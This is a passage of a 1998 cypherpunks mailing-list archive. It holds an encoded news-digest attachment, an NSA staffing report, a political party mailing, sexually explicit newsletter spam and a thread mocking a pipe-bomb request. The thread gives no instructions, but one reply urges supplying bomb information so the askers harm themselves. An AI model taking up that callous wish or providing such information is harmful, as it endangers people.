RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj5BIGNoaXAgdGhhdCBjYW4gYmUgaW5zdGFsbGVkIGZv
ciAkNSB0bwokOCBpbiBuZXcgcGhvbmVzIHNlbmRzIGEgc2lnbmFsIHRvIGEg
Y29tcHV0ZXIgdGhhdCBoZWxwcyBhIEdsb2JhbCBQb3NpdGlvbmluZwpTYXRl
bGxpdGUsIG9yIEdQUywgbG9jYXRlIHRoZSBjYWxsZXIgYW5kIHJlcG9ydCB0
aGUgcG9zaXRpb24gdG8gd2l0aGluCjEyIGZlZXQuJm5ic3A7IFdoZW4gYSBj
YWxsIGlzIG1hZGUgd2l0aCBvbmUgb2YgdGhlIHBob25lcywgaW5mb3JtYXRp
b24Kc2hvd3MgdXAgaW4gdGhlIGZvcm0gb2YgYSByZWQgZG90IG9uIGEgbWFw
IGluIGEgY29tcHV0ZXIgYXQgYW4gZW1lcmdlbmN5Cm9wZXJhdG9yJ3MgZGVz
ay4gVGhlIG1hcCBjYW4gZXZlbiBzaG93IHdoaWNoIHNpZGUgb2YgdGhlIHN0
cmVldCBhIGRyaXZlcgppcyBvbi4gKDxBIEhSRUY9Imh0dHA6Ly93d3cudGVj
aHNlcnZlci5jb20vbmV3c3Jvb20vbnRuL2luZm8vMDgyMDk4L2luZm8yMl8y
ODgyOF9ub2ZyYW1lcy5odG1sIj5OQU5ETy5ORVQ8L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjwvQlI+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
V0lDIENvbm5leHVzIFNlbGVjdHMKTmV3YnJpZGdlIE5ldHdvcmtzIGFuZCBB
bGNhdGVsJm5ic3A7PEJSPgpmb3IgV29ybGQncyBMYXJnZXN0IExNQ1MgQnVp
bGQtT3V0Jm5ic3A7PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPk5ld2JyaWRnZSBhbmQgQWxjYXRlbCB3aWxsIGJlIGVx
dWlwbWVudApzdXBwbGllcnMgZm9yIGEgJDQ1MC0kNTAwIG1pbGxpb24gbmF0
aW9uYWwgbG9jYWwgbXVsdGlwb2ludCBjb21tdW5pY2F0aW9ucwppbmZyYXN0
cnVjdHVyZS4gQ2FuYWRhJ3MgbGFyZ2VzdCBhZHZhbmNlZCwgd2lyZWxlc3Ms
IGJyb2FkYmFuZCB0ZWxlY29tbXVuaWNhdGlvbnMKbmV0d29yayB3aWxsIGJl
IHJvbGxlZCBvdXQgaW4gYWxsIHJlZ2lvbnMgb2YgQ2FuYWRhLCBiZWdpbm5p
bmcgaW4gVG9yb250bwppbiB0aGUgZmlyc3QgcXVhcnRlciBvZiAxOTk5LiAo
PEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zl
c3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zMjc3Ij5X
T1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48L0JSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPlNlY3VyRm9uZSBBbWVyaWNhLCBJbmMu
CkFubm91bmNlcyBTdHJhdGVnaWMgQWxsaWFuY2UmbmJzcDs8QlI+CndpdGgg
TURJLCBJbmMuIGFuZCBNREkgZGUgTWV4aWNvPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlNlY3VyRm9uZSBBbWVyaWNh
LCBJbmMuIGZvdW5kZWQgaW4gMTk5NiwKaXMgYSB0ZWxlY29tbXVuaWNhdGlv
bnMgY29tcGFueSBzcGVjaWFsaXppbmcgaW4gcHJlcGFpZCBjb21tdW5pY2F0
aW9ucwpzZXJ2aWNlLiBNaWNyb3dhdmUgRGVzaWducyBJbnRlcm5hdGlvbmFs
LCBJbmMuIChNREkpIGlzIGEgcHJpdmF0ZWx5IGhlbGQKd2lyZWxlc3MgZW5n
aW5lZXJpbmcgZmlybSBoZWFkcXVhcnRlcmVkIGluIFJpY2hhcmRzb24sIFRl
eGFzLiBJdHMgYWZmaWxpYXRlCk1ESSBkZSBNZXhpY28gUy5BLiBkZSBDLlYu
LCBpcyBoZWFkcXVhcnRlcmVkIGluIE1vbnRlcnJleSwgTWV4aWNvLiZuYnNw
OwpVbmRlciB0aGUgdGVybXMgb2YgYSBNZW1vcmFuZHVtIG9mIFVuZGVyc3Rh
bmRpbmcsIHRoZSBwYXJ0aWVzIHdpbGwgd29yawp0b2dldGhlciB0byBkZXZl
bG9wIGFuZCBkZXBsb3kgbmV3IHByZXBhaWQgY29tbXVuaWNhdGlvbnMgYW5k
IEludGVybmV0CnRlbGVwaG9ueSBiYXNlZCBzZXJ2aWNlcyBhbmQgc3lzdGVt
cywgYW5kIHByb3ZpZGUgZW5naW5lZXJpbmcgYW5kIHRlY2huaWNhbApzdXBw
b3J0IHNlcnZpY2VzLCBwcmltYXJpbHkgaW4gb3ZlcnNlYXMgbWFya2V0cy4m
bmJzcDsgKDxBIEhSRUY9Imh0dHA6Ly9iaXoueWFob28uY29tL2J3Lzk4MDgy
MC9zZWN1cmZvbmVfXzEuaHRtbCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjwvQlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+QWly
VG91Y2ggUGFzc2VzIDIwIE1pbGxpb24KV2lyZWxlc3MgQ3VzdG9tZXIgTWFy
ayBPdmVyc2VhczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj5DaGFpcm1hbiBhbmQgY2hpZWYgZXhlY3V0aXZlIFNhbSBH
aW5uCnJlcG9ydGVkIHRoYXQgdGhlIGNvbXBhbnkncyBmb3JlaWduIHZlbnR1
cmVzIGNyb3NzZWQgdGhlIDIwIG1pbGxpb24gY3VzdG9tZXIKbWFyayBpbiBK
dWx5LCBjZW1lbnRpbmcgQWlyVG91Y2gncyBzdGFuZGluZyBhcyB0aGUgd29y
bGQncyBsYXJnZXN0IHdpcmVsZXNzCmNvbW11bmljYXRpb25zIHByb3ZpZGVy
LiBXaXRoIG1vcmUgdGhhbiAzMiBtaWxsaW9uIHRvdGFsIHZlbnR1cmUgY3Vz
dG9tZXJzCmluIDEzIGNvdW50cmllcywgQWlyVG91Y2ggYW5kIGl0cyBwYXJ0
bmVycyBzZXJ2ZSBtb3JlIHRoYW4gMTAgcGVyY2VudCBvZgphbGwgdGhlIHdv
cmxkJ3Mgd2lyZWxlc3Mgc3Vic2NyaWJlcnMuICg8QSBIUkVGPSJodHRwOi8v
Yml6LnlhaG9vLmNvbS9idy85ODA4MjAvYWlydG91Y2hfY18yLmh0bWwiPllB
SE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48L0JSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBTSVpFPSsxPlVTVEEgU3VlcyBGQkkgb3ZlciBEaWdpdGFs
CldpcmV0YXAgUGxhbnM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+VGhlIFVuaXRlZCBTdGF0ZXMgVGVsZXBob25lIEFz
c29jaWF0aW9uCmZpbGVkIHN1aXQgV2VkbmVzZGF5IGFjY3VzaW5nIHRoZSBG
Qkkgb2Ygb3ZlcnN0ZXBwaW5nIHRoZSBib3VuZGFyaWVzIG9mCnRoZSBUZWxl
Y29tbXVuaWNhdGlvbnMgQWN0IG9mIDE5OTYgcmVnYXJkaW5nIHRoZSBhYmls
aXR5IG9mIGxhdyBlbmZvcmNlbWVudAphZ2VuY2llcyB0byB0YXAgaW50byB0
ZWxlcGhvbmUgYW5kIG90aGVyIGNvbW11bmljYXRpb25zIGxpbmVzLiBDZWxs
dWxhcgp0ZWxlcGhvbmUgaW5kdXN0cnkgZ3JvdXBzIGhhdmUgZmlsZWQgYSBz
aW1pbGFyIHN1aXQgYWdhaW5zdCB0aGUgRkJJIGFuZApKdXN0aWNlIERlcGFy
dG1lbnQuICg8QSBIUkVGPSJodHRwOi8vd3d3Lm5hbmRvLm5ldC9uZXdzcm9v
bS9udG4vaW5mby8wODIwOTgvaW5mbzVfMjI0ODMuaHRtbCI+TkFORE8uTkVU
PC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48L0JSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPk1vbmV5c3dvcnRoIEdpdmVzIEFkdmljZQpvbiBD
aG9vc2luZyB0aGUgQmVzdCBXaXJlbGVzcyBQaG9uZSBmb3IgWW91ciBTcGVj
aWZpYyBOZWVkczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj5DZWxsdWxhciBzZXJ2aWNlcyBhcmUgbW9yZSBsaWtlbHkg
dG8gZnVuY3Rpb24KaW4gcmVtb3RlIGFyZWFzIGJ1dCBvZnRlbiByZXF1aXJl
IGxvbmctdGVybSBjb250cmFjdHMuIFBDUyBwaG9uZXMgYXJlIGdlbmVyYWxs
eQpsZXNzIGV4cGVuc2l2ZSBhbmQgY2FuIHNlbmQgZGF0YSBzdWNoIGFzIEUt
bWFpbCwgc3RvY2sgcXVvdGVzIGFuZCBuZXdzCmhlYWRsaW5lcy4gKDxBIEhS
RUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9u
YWwvbmV3cy9mcmFtZWluZGV4LmNmbT9hcnRpY2xlaWQ9MzI4MSI+V09XLUNP
TTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PC9CUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0rMT5NZWRpYXRvciBSZWNlc3NlcyBVIFMKV0VTVCwg
VW5pb24gVGFsa3M7IE5vIE1vcmUgU2NoZWR1bGVkPC9GT05UPjwvRk9OVD48
L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkEgdGVyc2UgcmVsZWFz
ZSBmcm9tIG1lZGlhdG9yIEppbSBNYWhvbgpzYWlkIGhlIHdvdWxkICJjb250
aW51ZSB0byB3b3JrIHdpdGggYm90aCBwYXJ0aWVzLiIgSGUgYWxzbyByZWl0
ZXJhdGVkCnRoZSBibGFja291dCBvbiBpbmZvcm1hdGlvbiByZWdhcmRpbmcg
bmV3IHByb3Bvc2FscyB1bmRlciBkaXNjdXNzaW9uLiAoPEEgSFJFRj0iaHR0
cDovL3d3dy5uYW5kb3RpbWVzLmNvbS9uZXdzcm9vbS9udG4vYml6LzA4MjA5
OC9iaXoxMF85MjExLmh0bWwiPk5BTkRPClRJTUVTIE5FV1M8L0E+KSAtICg8
QSBIUkVGPSJodHRwOi8vd3d3LmZveG1hcmtldHdpcmUuY29tLzA4MjE5OC91
c3dlc3Quc21sIj5GT1gKTkVXUzwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly93
d3cudGVjaHdlYi5jb20vd2lyZS9zdG9yeS9yZXV0ZXJzL1JFVTE5OTgwODIw
UzAwMDQiPlRFQ0hXRUI8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjwvQlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+R29sZG1hbiBTYWNocyBT
ZWVzIE1pbGxlbm5pdW0KQnVnIFN0aW5naW5nIFUuUy4gRWNvbm9teTwvRk9O
VD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5Ud28g
R29sZG1hbiBTYWNocyBlY29ub21pc3RzLCBFZCBNY0tlbHZleQphbmQgQWxl
eCBQYXRlbGlzLCByZXBvcnQgdGhhdCB0aGUgZGF0ZSBjaGFuZ2UgY291bGQg
ZGlzcnVwdCB0aGUgZWNvbm9teQppbiB0aGUgZmlyc3QgZmV3IHdlZWtzIGFm
dGVyIHRoZSB0dXJuIG9mIHRoZSBjZW50dXJ5LCBidXQgY29tcGFuaWVzIHdv
dWxkCmNvbXBlbnNhdGUsIHdvcmtpbmcgb3ZlcnRpbWUgdG8gZml4IGNvbXB1
dGVyIGJ1Z3MuICg8QSBIUkVGPSJodHRwOi8vZGFpbHluZXdzLnlhaG9vLmNv
bS9oZWFkbGluZXMvdGMvc3RvcnkuaHRtbD9zPXYvbm0vMTk5ODA4MjEvdGMv
YnVnXzEuaHRtbCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjwvQlI+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+QW1lcmljYW4gTW9i
aWxlIEV4cGFuZHMKU2VuaW9yIE1hbmFnZW1lbnQgVGVhbTwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgYXBwb2lu
dG1lbnRzIGFyZSBNaWNoYWVsIE1jR2VlIHRvCnZpY2UgcHJlc2lkZW50IG9m
IG1hcmtldGluZywgTWljaGFlbCBXb29kcnVmZiB0byB2aWNlIHByZXNpZGVu
dCBvZiB0ZWNobm9sb2d5CmFuZCBvcGVyYXRpb25zLCBEZW5uaXMgTWF0aGVz
b24gdG8gdmljZSBwcmVzaWRlbnQgb2YgZW5naW5lZXJpbmcgYW5kIGFkdmFu
Y2VkCnRlY2hub2xvZ2llcywgVG9tIEJvd2VuIHRvIHZpY2UgcHJlc2lkZW50
IG9mIG9wZXJhdGlvbnMsIGFuZCBNaWNoYWVsIEZhYmJyaQp0byB2aWNlIHBy
ZXNpZGVudCBvZiBjb3Jwb3JhdGUgYWNjb3VudHMuICg8QSBIUkVGPSJodHRw
Oi8vYml6LnlhaG9vLmNvbS9idy85ODA4MjEvYW1lcmljYW5fbV8xLmh0bWwi
PllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48L0JSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPlJvYmVydCBBLiBMZW50byBBcHBvaW50
ZWQKU3IuIFZpY2UgUHJlc2lkZW50LCBTYWxlcyBhbmQgTWFya2V0aW5nIENv
bnZlcmd5cyBDdXN0b21lciBNYW5hZ2VtZW50IEdyb3VwPC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkxlbnRvIGlzIHJl
c3BvbnNpYmxlIGZvciBhbGwgc2FsZXMsIHNhbGVzCnN1cHBvcnQsIGFuZCBt
YXJrZXRpbmcgYWN0aXZpdGllcy4gUHJpb3IgdG8gaGlzIGN1cnJlbnQgcG9z
aXRpb24sIGhlIHNlcnZlZAphcyB0aGUgUHJlc2lkZW50IG9mIExBTiBTeXN0
ZW1zLCBhIGRpdmlzaW9uIG9mIERvbm5lbGxleSBFbnRlcnByaXNlIFNvbHV0
aW9ucy4KKDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcmVzdWx0
cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4LmNmbT9hcnRpY2xlaWQ9
MzI4NSI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Rm9yIGFk
ZGl0aW9uYWwgbmV3cyBhYm91dAp0aGUgd2lyZWxlc3MgaW5kdXN0cnktLWlu
Y2x1ZGluZyBwZXJpb2RpYyBuZXdzIHVwZGF0ZXMgdGhyb3VnaG91dCB0aGUg
ZGF5LS12aXNpdAo8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tIj5o
dHRwOi8vd3d3Lndvdy1jb20uY29tLjwvQT48L0ZPTlQ+PC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBX
SURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05U
IFNJWkU9LTE+Q1RJQSBEYWlseSBOZXdzIGZyb20gV09XLUNPTQppcyB0cmFu
c21pdHRlZCB3ZWVrZGF5cywgZXhjZXB0IGZvciBob2xpZGF5cy4gVmlzaXQg
dXMgb24gdGhlIFdvcmxkIFdpZGUKV2ViIGF0IDxBIEhSRUY9Imh0dHA6Ly93
d3cud293LWNvbS5jb20vcHJvZmVzc2lvbmFsIj5odHRwOi8vd3d3Lndvdy1j
b20uY29tL3Byb2Zlc3Npb25hbDwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4m
bmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0tMT5JZiB5b3UgYXJlIG5vdCBpbnRlcmVzdGVkCmluIHJlY2Vpdmlu
ZyB0aGUgQ1RJQSBEYWlseSBOZXdzIGZyb20gV09XLUNPTSwgcGxlYXNlIHNl
bmQgYSBtZXNzYWdlIHRvCjxBIEhSRUY9Im1haWx0bzp1bmpvaW4tQ1RJQV9E
YWlseV9OZXdzQHVtMi51bml0eW1haWwuY29tIj51bmpvaW4tQ1RJQV9EYWls
eV9OZXdzQHVtMi51bml0eW1haWwuY29tPC9BPi4mbmJzcDs8L0ZPTlQ+PC9G
T05UPiZuYnNwOwoKPFA+PEI+KioqPEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBTSVpFPS0xPiBUaGUgdGVybSAidW5qb2luLUNUSUFfRGFp
bHlfTmV3c0B1bTIudW5pdHltYWlsLmNvbSIKbXVzdCBiZSBsaXN0ZWQgaW4g
dGhlIFRPIHNlY3Rpb24gb2YgdGhlIGVtYWlsLjwvRk9OVD48L0ZPTlQ+ICoq
KjwvQj4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0tMT5QbGVhc2UgTm90ZTogU29tZSBvZiB0aGUKbGlua3Mg
aW4gdG9kYXkncyBuZXdzIGFyZSB0aW1lIHNlbnNpdGl2ZS4mbmJzcDsgVGhv
c2UgbGlua3MgbWF5IG5vdCBiZQphdmFpbGFibGUgYXMgbmV3cyBjaGFuZ2Vz
IHRocm91Z2hvdXQgdGhlIGRheS4mbmJzcDsgQWxzbywgc29tZSBuZXdzIHNv
dXJjZXMKbWF5IGJlIHN1YnNjcmlwdGlvbi1iYXNlZCBvciByZXF1aXJlIHJl
Z2lzdHJhdGlvbi48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgo8L1RBQkxFPgombmJzcDs8L0NFTlRFUj4K
PC9CT0RZPgo8L0hUTUw+Cg==
--Boundary..3995.1071713795.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 21 Aug 1998 12:54:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA and Industry Deal
Message-ID: <199808211954.PAA00582@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We offer a report on NSA's "Soft Landing" program
for placing ex-NSA employees in private industry by
offering inducements to contractors:

   http://jya.com/nsa-softcost.htm

Excerpt:

	A novel partnership between the National Security Agency 
and industry has helped NSA meet mandated reductions in 
personnel levels while at the same  time allowing the agency 
to refresh its workforce with technically skilled people.

	Dubbed "Soft Landing," the program encourages more senior, 
and often highly paid, support staff to take jobs in the private 
sector, thereby creating openings the agency can fill with the 
young computer scientists, mathematicians and engineers it 
needs to fulfill its code-making and code-breaking duties.

	Additionally, NSA has saved roughly $25 million through the 
effort,  which was implemented two years ago but has received 
no publicity. 

	While the Soft Landing program has received high-praise 
from government officials as well as industry representatives, 
some public interest advocates have questioned the effort, 
saying it has perhaps created an improper relationship 
between the secretive NSA and a select group of contractors.

End excerpt.

Wayne Madsen says the program is a means to plant 
sympathetic employees to sway industry NSA's way.
 
The file includes a second report on NSA's accounting 
problems.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Fri, 21 Aug 1998 00:33:10 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Pauline Hanson's One Nation August update
Message-ID: <1.5.4.32.19980821063101.00956984@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Issue 2.1b, May 1998

----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

Dear One Nation supporter in NSW

As we approach the next Federal election we have started to gear up further
on-line services for supporters.

We would draw your attention firstly to the Federal Election web page at:

http://www.onenation.com.au/onenation/federal

Secondly to the press release page where Pauline Hanson's press releases are
posted on the day that they are released. Here you can read the entire press
release content without media "cutting and pasting":

http://www.onenation.com.au/onenation/press

(Note press releases may be freely printed and photocopied without
restriction - as long as the content of the document is not altered.)

The latest press release is about Pauline Hanson's views on the GST:

http://www.onenation.com.au/onenation/press/gst1.html

Finally we would draw your attention to the new moderated discussion forum
where you can place posts, chat on-line with other One Nation members in
real time and interact with One Nation MPs. To participate follow the
instructions at:

http://www.onenation.com.au/onenation/forum.html

If you are able to help One Nation at a polling booth or by distributing
brochures etc please contact your state contact whose details may be seen at:

http://www.onenation.com.au/onenation/federal/become.htm

GWB



Scott Balson
Pauline Hanson's Web Master





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Fri, 21 Aug 1998 16:00:12 -0700 (PDT)
To: (STUFFED FRIDAY AUGUST 21 1998)
Subject: My hubby eats my panties every week/Realtor runs a REALLY open house
Message-ID: <19980821205137.6892.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


PLUS:  Frequent  Flabby  miles:  Charter  airline  redesigns
planes;  Life-saving pussy:  Perfect pets that save people's
lives;  Siamese twin  hookers - joined twins prove most pop-
ular in brothel;  Mega hot pussy - man's tongue swells after
oral sex;  Rock Feller gets a big surprise - read his latest
escapades;  Women are Easy by Johnny Shack,  part 10 - Where
do I find the  women I desire?;  Crazy Cult  found locked in
steamy  sex orgy;  Official:  Big noses = Better  sex;  Your
horoscope for today.

       ---->   http://stuffed.net/98/8/21/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

PLUS:  DUE TO READER REQUEST, WE NOW FEATURE 8 FULL PAGES OF
       ULTRA-HOT  "BEST OF THE BABES"  PHOTOS AT THE BACK OF
       EVERY ISSUE. BEAUTIFULLY PHOTOGRAPHED, THESE ARE SOME
       OF THE MOST GORGEOUS BABES ON THE PLANET AND,  UNLIKE
       THE REST OF STUFFED,  YOU GET TO SEE  ALL OF THEM! :)

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/21/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Fri, 21 Aug 1998 04:16:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Pipe
In-Reply-To: <b2769a39.35dc90b8@aol.com>
Message-ID: <3.0.5.32.19980821211614.008f9df0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 05:10 PM 8/20/98 EDT, FTPPork@aol.com wrote:
>I take that statement as an insult, and it really isn't true about all of us
>AOL users.  Of course, Hoppy was kinda stupid for asking something that
>stupid, but we don't all care about thrash music, hacking banks info, LSD
>manufacturing, and
> get rich quick schemes.  Actually, some of us know what real hacking is...
>not just using scrolling programs and cracking banks (Both of which are
>completely different) etc...
>
>Anyway, try not to stereotype people so much, because, with the Advent of 32
>bit AOL, we can actually use all of the TCP/IP protocols, etc...
>
>

Oh Gawd. If you are so cluefull, why do you still use AOL?
With the advent of 32 bit AOL???
*I* was smarter than this with 16 bit.
Just because you have 32 bit AOL doesn't mean you are a Uber user.
Uber AOL Lamer is more likely.
Etc.

Reeza!
	"Nothing is impossible for the man who doesn't have to do it 
	himself." 
						--Weiler's Law




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc Maffei" <marcmf@2xtreme.net>
Date: Fri, 21 Aug 1998 22:17:05 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: Pipe
Message-ID: <00b001bdcd89$846d2140$8e2193d0@marcmaff>
MIME-Version: 1.0
Content-Type: text/plain


please somebody give them the info so that they take themselves out of our
misery, since obviously they will botch the job and will give us great
pleasure with all the fireworks.

-----Original Message-----
From: Reeza! <howree@cable.navy.mil>
To: Tim May <tcmay@got.net>; HOPPYF1215@aol.com <HOPPYF1215@aol.com>;
cypherpunks@toad.com <cypherpunks@toad.com>
Date: Wednesday, August 19, 1998 10:13 PM
Subject: Re: Pipe


>At 05:33 PM 8/19/98 -0700, Tim May wrote:
>>At 4:28 PM -0700 8/19/98, HOPPYF1215@aol.com wrote:
>>>Send me info on how to make a pipe bomb. HoppyF1315
>>
>>
>>Hoppyhead,
>>
>>You'll have to wait until we supply the other AOLholes with the
information
>>they demanded on thrash music, hacking banks info, LSD manufacturing, and
>>get rich quick schemes.
>>
>>We're struggling under the workload of millions of new AOL, PacBell,
>>Earthlink, Prodigy, and other newbies who have just discovered the Net.
>>
>>--Tim May
>>
>
>Don't forget all the requests for band stickers,,,,
>
>Reeza1
> "Nothing is impossible for the man who doesn't have to do it
> himself."
> --Weiler's Law
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
